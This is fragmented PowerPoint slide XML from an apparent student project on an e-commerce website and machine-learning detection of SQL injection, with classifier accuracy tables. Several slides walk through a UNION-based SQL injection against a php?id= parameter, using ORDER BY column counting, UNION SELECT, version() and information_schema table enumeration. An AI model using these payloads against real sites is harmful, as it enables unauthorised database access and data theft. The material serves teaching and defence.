      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A164C612-8BAE-3143-65F1-21F8976730F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="7353300"/>
            <a:ext cx="62484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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="45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early_stopping</a:t>
            </a:r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92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929139" y="5991716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09600" y="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  <a:defRPr/>
            </a:pP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Heatmap for RNN-LSTM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AF0BE3AA-0E9F-A0FD-F5AE-5072444E9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33700"/>
            <a:ext cx="8305800" cy="662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3C4AC-CE70-B848-7326-F1E405FE4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165" y="2933700"/>
            <a:ext cx="8305800" cy="662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9F300-DAF6-9FF6-93A1-C8A3056A17E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280299" y="2185986"/>
            <a:ext cx="3031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Before increasing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6BFFD-6A19-E2B1-1850-9440ED7EFE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12273916" y="2185986"/>
            <a:ext cx="283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After increasing data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80597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6046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664494"/>
            <a:ext cx="17635538" cy="893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800" b="1" kern="100" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603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Accuracy results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" b="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calisto MT" panose="02040603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before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calisto MT" panose="02040603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increasing data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5800" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calisto MT" panose="0204060305050503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AD5286-0956-DB05-8BD7-0ACF073BB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44233"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1371600" y="2780428"/>
          <a:ext cx="15392400" cy="68420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val="205330287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4020882026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855830622"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1942730">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764358783"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2615214">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3553635839"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3138256">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="92164830"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="16778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Naïve-bayes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Decision-tree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Random-forest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690389"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1291051"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Maha, Daniyal, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="27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Suaad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363809"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1291051"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Vishal, Sachin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99.5%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673070"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1291051"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Vishal, Sachin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99.22%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98.66%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1114"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1291051"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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA" sz="27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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="27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95.13%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94.29%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93.79%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16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4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6046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6231" y="504823"/>
            <a:ext cx="17635538" cy="1001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500" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calisto MT" panose="02040603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 Before and after increasing data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6500" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calisto MT" panose="0204060305050503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DA308482-1FBF-FDD6-CD5B-7D63975AD1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148949"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="2019300"/>
          <a:ext cx="15697201" cy="77724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21837">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2265966949"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5387682">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3051629440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5387682">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3999311589"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1492979">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="35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6438" marR="151106" marT="151106" marB="1511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b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  <a:endParaRPr lang="en-US" sz="35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6438" marR="151106" marT="151106" marB="1511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b="0" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>After</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2328153650"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1262879"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RNN</a:t>
                      </a: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99.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ar-SA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+mn-cs"/>
                        </a:rPr>
                        <a:t>86</a:t>
                      </a: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35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99.85%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2469577172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1406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Naïve-bayes</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="35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95.58%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="32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cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>95.09%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4285742574"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1203373"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SVM</a:t>
                      </a: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95.13%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="35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94.94%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2930047079"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1203373"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Decision-tree</a:t>
                      </a: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94.29%</a:t>
                      </a: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94.06%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3438439988"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1203373"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Random-forest</a:t>
                      </a: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93.79%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3500" b="0" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>93.51%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="196438" marR="151106" marT="151106" marB="151106"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1361506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6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589690" y="1265304"/>
            <a:ext cx="12086663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786" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Website</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="78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+mn-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95400" y="3510391"/>
            <a:ext cx="16001999" cy="6052709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76400" y="4076700"/>
            <a:ext cx="14067601" cy="436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e-commerce(Known as electronic marketing)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" marR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4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marR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Electronic commerce is the buying, selling and exchanging of   goods and services over computer networks (the Internet) through which transactions or terms of sale are executed electronically.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279543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589690" y="1265304"/>
            <a:ext cx="12086663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 pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>System components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5400" y="3510391"/>
            <a:ext cx="16001999" cy="6052709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1999" y="3848100"/>
            <a:ext cx="14067601" cy="525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Administrator part and user part.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457200" marR="0" indent="-4572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administrator monitors users' activity and check the items and comment etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" indent="-4572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4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interface, individuals can view their products and can purchase the items they want.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29700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325600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83955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743068" y="1152303"/>
            <a:ext cx="12086663" cy="131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786" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Languages and tools</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="78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 panose="02040603050505030304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-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85800" y="3514925"/>
            <a:ext cx="16611599" cy="6505375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66800" y="3659584"/>
            <a:ext cx="14804202" cy="6360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600" b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Languages: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HTML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CSS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JS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Bootstrap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PHP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kern="1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Mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1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+mj-lt"/>
              </a:rPr>
              <a:t>Tools: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Visual Studio Code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kern="1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Xammp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1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61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6046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190352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1. Admin panel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E80227A-8ED5-438C-AA92-86E39FB57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00300"/>
            <a:ext cx="17297400" cy="746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0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900368" y="2109708"/>
            <a:ext cx="1400485" cy="8202957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3000">
                <a:latin typeface="+mj-lt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84659" y="495300"/>
            <a:ext cx="7416941" cy="152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</a:rPr>
              <a:t>AGENDA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46343" y="3467100"/>
            <a:ext cx="937219" cy="62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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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12189" y="4305300"/>
            <a:ext cx="937219" cy="632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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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2188" y="5067300"/>
            <a:ext cx="937219" cy="62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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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829300"/>
            <a:ext cx="937219" cy="62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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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5837" y="6667500"/>
            <a:ext cx="937219" cy="62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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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066" y="7581900"/>
            <a:ext cx="937219" cy="62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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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35159" y="3621575"/>
            <a:ext cx="5790503" cy="45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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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7665" y="4381500"/>
            <a:ext cx="5790503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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SQLi 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27665" y="5219700"/>
            <a:ext cx="6076629" cy="45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  <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ARTIFICIAL INTELLIGENCE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35159" y="5983775"/>
            <a:ext cx="5790503" cy="45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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>WEBSITE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45F8E5EB-E0D0-4605-87BC-E004D92D44AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5246772" y="8473291"/>
            <a:ext cx="937219" cy="63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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363636"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>07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865EE1C6-C6FC-44AA-A115-FC605C41353F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6488525" y="6816162"/>
            <a:ext cx="5797998" cy="2256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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SQL INJECTION TYPES</a:t>
            </a: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3500" spc="247" dirty="0">
              <a:solidFill>
                <a:srgbClr val="231F20"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>DEPLOYMENT OUR MODEL</a:t>
            </a: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3500" spc="247" dirty="0">
              <a:solidFill>
                <a:srgbClr val="231F20"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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500" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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349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34E1-AB42-722D-D141-7A7B3D12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754600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.1 Member Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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2BC1D-80A5-836B-C2A0-EFA4BB56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97" y="2961694"/>
            <a:ext cx="14608806" cy="60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934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9643-0FAF-D9C7-355A-57C2CDC5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8288000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.2 Pending Member Page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D6295B-67F5-D444-4E78-72C65E51F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66" y="3822829"/>
            <a:ext cx="14631668" cy="435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90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49AE-1C77-F248-D5DD-7675E825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602200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.3 Items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B3BC38-0DF7-ABDD-6E10-DF00DF56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30" y="2738438"/>
            <a:ext cx="13772940" cy="652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126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9CB6-93FD-AC89-4ED0-744941E0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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.4 Comments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107DE-A0FC-FEEB-78FA-E4DE59A3B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66" y="3708519"/>
            <a:ext cx="14631668" cy="458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613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423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190352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2</a:t>
            </a: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. Home page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3210E0-3D69-329C-A85E-C0DC454FC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0"/>
            <a:ext cx="15620999" cy="6861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0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E8DF-F89F-164B-AB49-E3A4B45AD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47700"/>
            <a:ext cx="17297400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.1 Add Items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CE98F-FF2B-E4B6-9391-98C9C06E2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CB054D-18C2-6FC4-6077-ED27B1ECF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41" y="2318038"/>
            <a:ext cx="16635717" cy="7324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6500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6046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190352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3</a:t>
            </a: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. </a:t>
            </a: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Database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1CD9D-A648-914C-3053-C8DD027BE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71700"/>
            <a:ext cx="15649575" cy="701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2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776739" y="77073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800" y="3810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1. Error based SQL injections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E355A-C6F6-4E90-BB5E-A9044F1E9DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2019300"/>
            <a:ext cx="17373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Error-based SQL Injections obtain information about the database structure from error messages issued by the database server.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FA1601-712F-4A84-8A4E-0E3057863A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" b="79473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3619501"/>
            <a:ext cx="17559936" cy="641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776739" y="77073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114300"/>
            <a:ext cx="17607643" cy="1500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Determine number of columns required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32681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A7BBB-90B1-486C-951C-55CBB976EF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69"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5488739"/>
            <a:ext cx="17302843" cy="434816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D107C0-9455-4DC4-9DB2-76452A4419D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1943100"/>
            <a:ext cx="8008257" cy="17812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determine the number of columns required in an SQL injection UNION attack, we will Inject a sequence of ORDER BY. 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BCECAB-2B81-49B0-B131-B96420E6DF39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669896" y="2056870"/>
            <a:ext cx="7640531" cy="1413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php?id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=1' order by 1 --     no error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php?id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=1' order by 4 --     we get error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90762-E71E-4F44-8FAB-02814EE57142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4291087"/>
            <a:ext cx="85779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applying the fourth query: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5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776739" y="77073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800" y="-114300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Discover the vulnerable columns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D107C0-9455-4DC4-9DB2-76452A4419D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1333500"/>
            <a:ext cx="9372600" cy="17812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Id=-1’UNION SELECT 1,2,3 --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DE80F9-08BC-40AD-8F05-1D76B9526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8" y="2813136"/>
            <a:ext cx="17061543" cy="73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284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5071" y="3185567"/>
            <a:ext cx="8439016" cy="1257326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87696" y="805694"/>
            <a:ext cx="10442304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36853" y="3678361"/>
            <a:ext cx="8526480" cy="440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50"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="216" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>What is SQL injection?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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955A3024-0EA4-4DAB-B0C0-C56A8224D2A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1001661" y="4726468"/>
            <a:ext cx="8732427" cy="1339895"/>
            <a:chOff x="0" y="-69340"/>
            <a:chExt cx="3810042" cy="816086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EC0EDBA-622D-4F8A-917A-476BF0D115BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="128018" y="-6934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BEF3DB25-1629-4CAA-B93A-6F6A20772B75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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FAD6CF-038D-40EA-B786-5FBE8C9BB79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295071" y="6429390"/>
            <a:ext cx="8439016" cy="1257326"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3682024" cy="746746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022664E2-AEA6-4BB6-9462-75E530771215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0660F7D8-24CA-4D6C-85B9-E20646D4E058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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2469F3EA-905F-4AD1-BCB9-E19AB3421B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836853" y="6974170"/>
            <a:ext cx="8526480" cy="433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4000" spc="216" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Security of Website.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7DE9F5E1-F62B-438E-A535-CA572F69D234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836853" y="5313038"/>
            <a:ext cx="8526480" cy="440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4000" spc="216" dirty="0">
              <a:solidFill>
                <a:srgbClr val="231F20"/>
              </a:solidFill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35920C-F492-4BB5-BDD1-31996314A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158" y="2134108"/>
            <a:ext cx="6529207" cy="30795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3875D51-1721-47DD-8EA0-EC262B3C6A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48076" r="34890"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10889238" y="6315346"/>
            <a:ext cx="6646333" cy="27646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6BDC4-CCCA-3BDC-A257-B0AF3ABA1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452" y="4806046"/>
            <a:ext cx="6700085" cy="1066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776739" y="77073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800" y="-222336"/>
            <a:ext cx="16764000" cy="1510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Discovery the version of BD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D107C0-9455-4DC4-9DB2-76452A4419D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2171700"/>
            <a:ext cx="16992600" cy="23146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php?id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=-1‘UNION SELECT 1, version (), database () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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This will provide the database we are currently using as well as the current version and the name of the database utilized at the backend.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AE4A-698B-43E2-BD68-66988C5FB1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r="9343" b="9808"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4838700"/>
            <a:ext cx="16383000" cy="53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776739" y="77073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800" y="-38100"/>
            <a:ext cx="16764000" cy="1510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Retrieve data from database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D107C0-9455-4DC4-9DB2-76452A4419D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359229" y="1714500"/>
            <a:ext cx="17852571" cy="17812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We can use these vulnerable columns and can retrieve data from database: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sz="3500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0">
